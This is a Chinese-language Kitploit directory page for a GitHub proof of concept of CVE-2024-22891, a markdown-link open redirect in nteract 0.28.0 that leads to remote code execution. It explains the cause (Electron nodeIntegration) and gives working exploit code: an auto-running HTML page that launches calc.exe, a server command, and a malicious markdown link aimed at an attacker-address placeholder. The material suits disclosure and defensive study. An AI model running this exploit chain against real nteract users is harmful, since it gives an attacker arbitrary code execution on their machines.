Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/eqstlab/cve-2024-22891
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubeqstlab/cve-2024-22891

CVE-2024-22891

nteract 0.28.0 开放重定向到 RCE 漏洞利用

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Nteract PoC

CVE-2024-22891 漏洞的概念验证(Proof-of-Concept)。

nteract 0.28.0 允许通过 Markdown 链接使用 Electron Webview,从而导致远程代码执行。

该存储库中包含一个存在漏洞的示例应用及其概念验证(POC)利用代码。 作为 PoC,其中提供了一个可自动完成该过程的 Python 文件。

1. 漏洞概述:

  • 漏洞主题:Markdown 链接 RCE
  • 漏洞类型:其他:开放重定向(Open Redirect)
  • 问题表现:Electron Webview
  • 受影响组件:markdown
  • 攻击类型:远程代码执行(Remote Code Execution)
  • 攻击向量:要利用该漏洞,必须有人点击该链接或访问共享项目的链接。
  • 预留 CVE 编号:CVE-2024-22891

2. 漏洞成因:

  • nteract 0.28.0 允许通过 Markdown 链接使用 Electron Webview,从而导致远程代码执行(因为 webPreferences 中的 nodeIntegration 为 true)。

  • 利用原理说明

    • 当应用内通过 Markdown 生成链接时,它会借助 Electron 创建一个 WebView,从而允许外部访问该链接。因此,攻击者可以通过让用户连接到指向攻击者服务器的链接来实现远程代码执行(RCE)。

概念验证(POC)

步骤 1)攻击者搭建服务器,托管用于通过 openExternal() 函数启动 calc.exe 的源代码。

root@kitploit:~
<html>
<head>
    <title>jruru Link</title>
</head>
<body>
    <a id="jruruLink">jruru Link</a>

    <script>
         // Script function definition
        function openExternal() {
            try {
                const { shell } = require('electron');
                shell.openExternal('file:C:/Windows/System32/calc.exe');
            } catch(e) {
                alert('JRURU - External link cannot be opened.');
                console.error(e);
            }
        }
        // Automatically execute openExternal function after the page is loaded
        document.addEventListener('DOMContentLoaded', function() {
            openExternal();
        });
    </script>
</body>
</html>

注意: ※ 如果想快速测试,可在攻击者的电脑上使用以下代码创建服务器。

root@kitploit:~
$ python -m http.server 80

步骤 2)在受害者系统上运行 nteract 应用并创建 Markdown 链接,或者分享攻击者的 ipynb 文件作为示例代码。然后,执行 calc.exe。

root@kitploit:~
[Read This] (http://[attcker_adress]/shard_data.html)

neteract nteract2


3. 附加信息

通过文件共享执行 .ipynb 文件时,请注意链接可能不可见。这个 calc.exe 原本可以是任何本地或远程的恶意载荷,攻击者借此即可完全访问受害者的系统。

下载工具